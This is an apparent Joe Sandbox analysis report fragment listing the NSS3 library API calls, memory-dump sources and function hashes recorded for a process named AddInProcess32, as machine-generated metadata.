                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Item_$Error_$ArenaErrorFree
                                                                                      • String ID:
                                                                                      • API String ID: 3303145257-0
                                                                                      • Opcode ID: e122e9210de7baf1fe817d97056911c5df2287b0eba00e555a389a1808aa6d64
                                                                                      • Instruction ID: d8d5bed0616966dd32f9d95a9e55b066ba46445dd4ffe4617d0f8e8f1a6fe2bc
                                                                                      • Opcode Fuzzy Hash: e122e9210de7baf1fe817d97056911c5df2287b0eba00e555a389a1808aa6d64
                                                                                      • Instruction Fuzzy Hash: 7511E5322092147BEF012BA9EC04D99B779EB4366CB150139FB0445AF1EF269954D6E0
                                                                                      APIs
                                                                                      • PORT_NewArena_Util.NSS3(00010001,00000000), ref: 6CD2DD1B
                                                                                        • Part of subcall function 6CD1CA68: PR_SetError.NSS3(FFFFE013,00000000,?,6CCE3237,00000800,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA7B
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,0000001C,?,?,00000000), ref: 6CD2DD33
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(00000000,0000001C,00000000,0000001C,?,?,00000000), ref: 6CD2DD3D
                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,00000000), ref: 6CD2DEED
                                                                                        • Part of subcall function 6CCE3A43: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000007,00000000,?,0001000A,?,6CD2DD85,?,?,?,?,00000000), ref: 6CCE3A91
                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6CD70DF0,00000000,?,?,?,00000000), ref: 6CD2DDA9
                                                                                        • Part of subcall function 6CD18A99: PORT_SetError_Util.NSS3(FFFFE08C,?,?,00000000), ref: 6CD18AE6
                                                                                        • Part of subcall function 6CD2DC54: SECOID_FindOIDTag_Util.NSS3(6CD2DDD8,00000000,00000000,00000000,?,6CD2DDD8,00000000,?,?,?,?,?,?,?,00000000), ref: 6CD2DC5E
                                                                                      • CERT_ExtractPublicKey.NSS3(?,?,?,?,00000000), ref: 6CD2DE07
                                                                                      • SECKEY_GetPublicKeyType.NSS3(00000000,00000000,?,?,?,00000000), ref: 6CD2DE20
                                                                                      • SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,?,?,00000000), ref: 6CD2DE2A
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000001,?,?,?,00000000), ref: 6CD2DE98
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_ArenaItem_Public$Arena_Free$AllocDecodeDestroyErrorError_ExtractFindQuickTag_Typememset
                                                                                      • String ID:
                                                                                      • API String ID: 2561946686-0
                                                                                      • Opcode ID: 6639b3d289da565bb9e2fecb1a0702637522895ec6afddc4816620e67084481a
                                                                                      • Instruction ID: 7b6ac37d6801f24248fcf9207896e03a5aef364208cd89c708536908a40e641d
                                                                                      • Opcode Fuzzy Hash: 6639b3d289da565bb9e2fecb1a0702637522895ec6afddc4816620e67084481a
                                                                                      • Instruction Fuzzy Hash: 4E61C371D05315EFDB149F98C440BEEB7F4EF19319F200069EA94A7A64EB79D940CBA0
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE00D), ref: 6CCE4C7E
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_NewArena_Util.NSS3(00001000), ref: 6CCE4C9A
                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CCE4CB0
                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CCE4CC8
                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6CCE4D28
                                                                                      • CERT_DestroyCertificate.NSS3(?), ref: 6CCE4D60
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Alloc_Arena$Arena_CertificateCopyDestroyErrorError_Item_
                                                                                      • String ID:
                                                                                      • API String ID: 1446305433-0
                                                                                      • Opcode ID: 884f64ee2bf6b823c9617e653113262abc3409f93744901552d035c1a6d1b628
                                                                                      • Instruction ID: 0fca5a3bed95178f75b4eb922edcc149db23fa85ce5b3c2c93f9f6f1c0f43174
                                                                                      • Opcode Fuzzy Hash: 884f64ee2bf6b823c9617e653113262abc3409f93744901552d035c1a6d1b628
                                                                                      • Instruction Fuzzy Hash: 70516471E052069BEB04DFA9D880AAE77F9EF8D318F14416DE514E7B50FB34D9058B60
                                                                                      APIs
                                                                                      • PORT_InitCheapArena.NSS3(?,00000800,00000001,00000000,00000000), ref: 6CCDCECD
                                                                                        • Part of subcall function 6CD1CA46: PL_InitArenaPool.NSS3(00000000,security,00000000,00000008,?,6CCE33EC,?,00000800,00000000,00000000,00000000,?,00000000,?,?,6CCDC83E), ref: 6CD1CA5E
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,FFEDDBE9,?,00000800,00000001,00000000,00000000), ref: 6CCDCEEF
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • PORT_DestroyCheapArena.NSS3(?,?,00000001,00000000,00000000), ref: 6CCDD017
                                                                                        • Part of subcall function 6CCDCDA1: PL_strlen.NSS3(?,00000000,6CCDD978,6CCDDA44,?,6CCDDA44,0000001F,?,00000001,00000000,00000000), ref: 6CCDCDBE
                                                                                        • Part of subcall function 6CCDCDA1: tolower.API-MS-WIN-CRT-STRING-L1-1-0(6CCDDA44,00000000,6CCDD978,6CCDDA44,?,6CCDDA44,0000001F,?,00000001,00000000,00000000), ref: 6CCDCDDB
                                                                                      • CERT_FindCertExtension.NSS3(6CCDD978,00000053,?,00000000,00000000,00000000,?,6CCDDA44,00000063,00000000,00000000,00000000,?,6CCDDA44,0000001F), ref: 6CCDCF47
                                                                                      • CERT_DecodeAltNameExtension.NSS3(?,?), ref: 6CCDCF68
                                                                                        • Part of subcall function 6CCE49D8: PORT_SetError_Util.NSS3(FFFFE023,?,6CCDCF6D), ref: 6CCE4A31
                                                                                      • CERT_GetNextGeneralName.NSS3(00000000), ref: 6CCDCFCE
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000000), ref: 6CCDCFE4
                                                                                      • PORT_ArenaAlloc_Util.NSS3(6CCDD978,00000001), ref: 6CCDCFFB
                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CCDD00B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Arena$Util$Alloc_$CheapExtensionInitName$CertDecodeDestroyError_FindFreeGeneralItem_L_strlenNextPoolmemcpymemsettolower
                                                                                      • String ID:
                                                                                      • API String ID: 1446780999-0
                                                                                      • Opcode ID: 6a6550e846c5259ad5850777bc17ffdae549b96206b76acf8d716971b3220a40
                                                                                      • Instruction ID: aaacf87e3cdfe45eae47f13520940ee1262ce0f8c9b51cb8128f7b5d764b1529
                                                                                      • Opcode Fuzzy Hash: 6a6550e846c5259ad5850777bc17ffdae549b96206b76acf8d716971b3220a40
                                                                                      • Instruction Fuzzy Hash: AF416672D04218BADB10EBA4DC85EEF77BCEF45614F110166FA05E7640FB71AA09C7A1
                                                                                      APIs
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,00000000,6CCEDB58), ref: 6CCEBDFF
                                                                                        • Part of subcall function 6CD18C17: SECOID_FindOIDTag_Util.NSS3(?,?,6CCEAD2B,?,?,6CCDD706,?,?,?,?,6CCDDC0B,?,?), ref: 6CD18C28
                                                                                      • PORT_SetError_Util.NSS3(FFFFE006,?,00000000,6CCEDB58), ref: 6CCEBE2B
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,00000000,6CCEDB58), ref: 6CCEBE6F
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,?,00000000,6CCEDB58), ref: 6CCEBE7D
                                                                                      • PORT_InitCheapArena.NSS3(?,00000800,?,00000000,6CCEDB58), ref: 6CCEBE8E
                                                                                      • NSS_Get_SECOID_AlgorithmIDTemplate_Util.NSS3(00000000,00000000,-0000000C,?,00000000,6CCEDB58), ref: 6CCEBEA0
                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,00000000,-0000000C,?,00000000,6CCEDB58), ref: 6CCEBEB0
                                                                                      • PORT_DestroyCheapArena.NSS3(?,?,?,00000000,-0000000C,?,00000000,6CCEDB58), ref: 6CCEBEBB
                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,00000000,6CCEDB58), ref: 6CCEBECF
                                                                                        • Part of subcall function 6CCEBD9C: PORT_SetError_Util.NSS3(FFFFE006,?,6CCEBEDA,00000000,?,?,?,?,00000000,6CCEDB58), ref: 6CCEBDC2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$AlgorithmTag_$Error_$ArenaCheap$DecodeDestroyFindGet_InitItem_QuickTemplate_
                                                                                      • String ID:
                                                                                      • API String ID: 2594870522-0
                                                                                      • Opcode ID: ffa02707baf596de72a7215ed3cd02f619c087de2074e8ac6ae3acb0c6037379
                                                                                      • Instruction ID: 096558305f2b797be76013e99371806e7807a60e4808346a6771d5b3b454f99b
                                                                                      • Opcode Fuzzy Hash: ffa02707baf596de72a7215ed3cd02f619c087de2074e8ac6ae3acb0c6037379
                                                                                      • Instruction Fuzzy Hash: 2141C872509304AAD7109A79E9A4BF677A8AB0B328F204527E724C7EE0FB34D544CB59
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,?,?,6CD088B6,?,?,?,?), ref: 6CCDFFEE
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_NewArena_Util.NSS3(00000800,?,?,?,6CD088B6,?,?,?,?), ref: 6CCE000F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena_ErrorError_
                                                                                      • String ID:
                                                                                      • API String ID: 3628111315-0
                                                                                      • Opcode ID: 1e4e0bf512cbbd90c9322e2467d1b575b21cb7ecc6359e17fe0f2a7f1beaa78f
                                                                                      • Instruction ID: f99daac8eaab6dfcd9edf7d9a4691a71a90573bc6d262580ed9f93ff9e146c58
                                                                                      • Opcode Fuzzy Hash: 1e4e0bf512cbbd90c9322e2467d1b575b21cb7ecc6359e17fe0f2a7f1beaa78f
                                                                                      • Instruction Fuzzy Hash: 6141137110D3829AEB119F25A840BAB37E8AB4B31CF20402DE9559EE81FF75C045E7E2
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(?,?,00000000,000000FF,00000800,?,6CCE74A4,00000000,?,?,?,00000000,?,6CCE728A,000000FF,?), ref: 6CCE8AEA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,00000088,?,?,00000000,000000FF,00000800,?,6CCE74A4,00000000,?,?,?,00000000,?,6CCE728A), ref: 6CCE8AF8
                                                                                        • Part of subcall function 6CD1C92F: PORT_ArenaAlloc_Util.NSS3(00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C943
                                                                                        • Part of subcall function 6CD1C92F: memset.VCRUNTIME140(00000000,00000000,00000000,?,?,?,6CCE31E3,00000000,00000018,?,00000000,?,6CCDCBFF,?), ref: 6CD1C954
                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(?,00000000,00000004,00000000), ref: 6CCE8B10
                                                                                        • Part of subcall function 6CD18C34: SECOID_FindOIDByTag_Util.NSS3(?,00000000,?,6CCE8B15,?,00000000,00000004,00000000), ref: 6CD18C3C
                                                                                        • Part of subcall function 6CD18C34: PORT_SetError_Util.NSS3(FFFFE006,00000000,?,6CCE8B15,?,00000000,00000004,00000000), ref: 6CD18C4B
                                                                                      • CERT_FindCertIssuer.NSS3(?,?,?,0000000B), ref: 6CCE8B2B
                                                                                        • Part of subcall function 6CCE5B53: PORT_SetError_Util.NSS3(FFFFE00D,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6CCE5C19
                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CCE8BD6
                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000030,?,00000000), ref: 6CCE8BEB
                                                                                        • Part of subcall function 6CD1BB68: PORT_ArenaAlloc_Util.NSS3(?,?,?,6CCDCAF2,?,6CD16CFC,?,?,00000000,?,?,00000000), ref: 6CD1BB8E
                                                                                      • PT_FPrintStats.NSS3(?,?), ref: 6CCE8BFB
                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CCE8C09
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,?), ref: 6CCE8C13
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_$CertificateDestroyError_Find$AlgorithmCertCopyIssuerItem_LockMark_PrintRelease_StatsTag_Unlockmemset
                                                                                      • String ID:
                                                                                      • API String ID: 2711243944-0
                                                                                      • Opcode ID: d9cc4a9faf87a6e2958c93f71ad81a173f37ee1b38788882f0901b34f0ceddaa
                                                                                      • Instruction ID: 3e0bfae6b44a02b5bcc403b315cd7decae096f13106f0daf969a2b777866e251
                                                                                      • Opcode Fuzzy Hash: d9cc4a9faf87a6e2958c93f71ad81a173f37ee1b38788882f0901b34f0ceddaa
                                                                                      • Instruction Fuzzy Hash: 533191B29013047BF7219A698D81FBB72ECDF0A698F00052AFE14D2B91F771E9049761
                                                                                      APIs
                                                                                        • Part of subcall function 6CCDFFDE: PORT_SetError_Util.NSS3(FFFFE005,?,?,6CD088B6,?,?,?,?), ref: 6CCDFFEE
                                                                                      • PORT_SetError_Util.NSS3(FFFFE03E), ref: 6CD088D5
                                                                                      • SEC_DestroyCrl.NSS3(00000000), ref: 6CD088DE
                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6CD088E9
                                                                                      • CERT_GetDefaultCertDB.NSS3 ref: 6CD08908
                                                                                      • CERT_FindCertByName.NSS3(00000000,0000002C), ref: 6CD08914
                                                                                      • PORT_SetError_Util.NSS3(FFFFE03C), ref: 6CD08926
                                                                                      • CERT_CheckCertUsage.NSS3(00000000,00000002), ref: 6CD08934
                                                                                      • PR_Now.NSS3(?), ref: 6CD08942
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CertError_Util$Destroy$CertificateCheckDefaultFindNameUsage
                                                                                      • String ID:
                                                                                      • API String ID: 2898331623-0
                                                                                      • Opcode ID: 9ea71d9b90cb941a59903fd86ed4f328c95b4143e7dafd865369daeb1ab9cd73
                                                                                      • Instruction ID: 8678a9f0ec5175be7b484fc4c53a0445e9a584ca0284ae2787a365356a6e3f6a
                                                                                      • Opcode Fuzzy Hash: 9ea71d9b90cb941a59903fd86ed4f328c95b4143e7dafd865369daeb1ab9cd73
                                                                                      • Instruction Fuzzy Hash: AB212C32A08614BBDB112F6DAC00DDF77A9EF85378B150217FD0492F71EB31C95486A2
                                                                                      APIs
                                                                                      • PR_NewLock.NSS3(?,00000000,00000000,6CCEE2F6), ref: 6CCE0DE0
                                                                                      • PR_NewLock.NSS3 ref: 6CCE0DE7
                                                                                      • PL_NewHashTable.NSS3(00000000,6CD1BC96,6CD1BCCA,6CD20BCE,00000000,00000000), ref: 6CCE0E05
                                                                                      • PL_NewHashTable.NSS3(00000000,6CD1BC96,6CD1BCCA,6CD20BCE,00000000,00000000,00000000,6CD1BC96,6CD1BCCA,6CD20BCE,00000000,00000000), ref: 6CCE0E19
                                                                                        • Part of subcall function 6CD2108D: PR_CeilingLog2.NSS3(00000010,00000000,?,6CCE0389,00000000,6CD1BC96,?,?,6CD87574,00000000,?,?,00000000,?,6CCE0D2C,?), ref: 6CD210F9
                                                                                      • PR_DestroyLock.NSS3(05203E50), ref: 6CCE0E5A
                                                                                      • PR_DestroyLock.NSS3(05203EE0), ref: 6CCE0E73
                                                                                      • PL_HashTableDestroy.NSS3(05212160), ref: 6CCE0E8C
                                                                                      • PL_HashTableDestroy.NSS3(00000000), ref: 6CCE0EA2
                                                                                      • PORT_SetError_Util.NSS3(FFFFE001,00000000,00000000,6CCEE2F6), ref: 6CCE0EB5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: DestroyHashLockTable$CeilingError_Log2Util
                                                                                      • String ID:
                                                                                      • API String ID: 248463325-0
                                                                                      • Opcode ID: e714e21fa8c53081434cbd3786dfc75b4f51cf4487bdf8ce6582fe2c972b3b08
                                                                                      • Instruction ID: d2acb6ba7e57facbfdc8da5e69d4dd3f963c29ea5a5448a3206986abb800a739
                                                                                      • Opcode Fuzzy Hash: e714e21fa8c53081434cbd3786dfc75b4f51cf4487bdf8ce6582fe2c972b3b08
                                                                                      • Instruction Fuzzy Hash: 60312D71A27390DEFF248B659884B6232BCA74B719F18053EF78093AD0DB745444DAE4
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,?,6CD23ABA,?,000000A8,?,?,?,00000000), ref: 6CD2491F
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,00000018,?,00000000,?,?,?,6CD23ABA,?,000000A8,?,?,?,00000000), ref: 6CD24929
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,00000000,?,?,00000000), ref: 6CD24939
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,?,00000000,?,?,00000000), ref: 6CD24943
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Arena$Alloc_Error_Mark_Release_
                                                                                      • String ID:
                                                                                      • API String ID: 2281046501-0
                                                                                      • Opcode ID: 79fb4297d186d9366b06b6443c30532fe23ace9b6ca5b7d4a0c76f2b51ab8055
                                                                                      • Instruction ID: 8a4178e72e3aafc7cc9b0feaa5f5fcab0fdb298c21d441f4d8ba4e36e7d65584
                                                                                      • Opcode Fuzzy Hash: 79fb4297d186d9366b06b6443c30532fe23ace9b6ca5b7d4a0c76f2b51ab8055
                                                                                      • Instruction Fuzzy Hash: EB01D16264E22579AB2133697C80EDF625C8FC266C7140239FE04D6F60FB0D8A09A1B9
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFD01C,6CD33691,00000002,0000002F,00000400,00000000,?,?,?,?,6CD33691), ref: 6CD38220
                                                                                        • Part of subcall function 6CD1693A: PR_GetCurrentThread.NSS3(-00000165,00000000,?,6CD1C559,?,00000000,?,6CD1C167,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?), ref: 6CD1693F
                                                                                        • Part of subcall function 6CD1693A: PR_Lock.NSS3(00000000,?,6CD1C559,?,00000000,?,6CD1C167,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?,00000000), ref: 6CD1694C
                                                                                        • Part of subcall function 6CD1693A: PR_Unlock.NSS3(00000000,00000000,?,6CCE3550,?,?,6CCE31FB,00000000,?,00000000,?,?,00000000,?,6CCDCBFF,?), ref: 6CD1697D
                                                                                      • SECITEM_FreeItem_Util.NSS3(?,00000000), ref: 6CD380F0
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,6CD33C01), ref: 6CD38108
                                                                                      • SECITEM_FreeItem_Util.NSS3(6CD33C01,00000000), ref: 6CD38192
                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,6CD33C01,?), ref: 6CD381A4
                                                                                        • Part of subcall function 6CD3BDC7: PORT_SetError_Util.NSS3(FFFFE001,6CD33691,?,6CD381F9,6CD33691,6CD33D0D,00000000,6CD3C30F), ref: 6CD3BE3C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Item_$CopyError_Free$CurrentLockThreadUnlock
                                                                                      • String ID: p
                                                                                      • API String ID: 101473181-2181537457
                                                                                      • Opcode ID: e985702f88add8d7887abe2a7b13c0ec82b49989553cc3fe706562b4c83c7126
                                                                                      • Instruction ID: 01e599f21284be52aa7cfbdc34e04a6b205ef599bcf09963193c1611b8ef9ad0
                                                                                      • Opcode Fuzzy Hash: e985702f88add8d7887abe2a7b13c0ec82b49989553cc3fe706562b4c83c7126
                                                                                      • Instruction Fuzzy Hash: E161C572408F10EBD7209B65DC40A9BB3F8AF42328F20561FE56DD6EB0E735A5498B64
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE8B2,00000000), ref: 6CCD3E9F
                                                                                      • PR_Malloc.NSS3(?), ref: 6CCD3F21
                                                                                      • PR_Realloc.NSS3(?,?), ref: 6CCD3F29
                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CCD3F3A
                                                                                      • ___swprintf_l.LIBCMT(?,?,:%s:%d:0x%lx,?,?,?), ref: 6CCD3F78
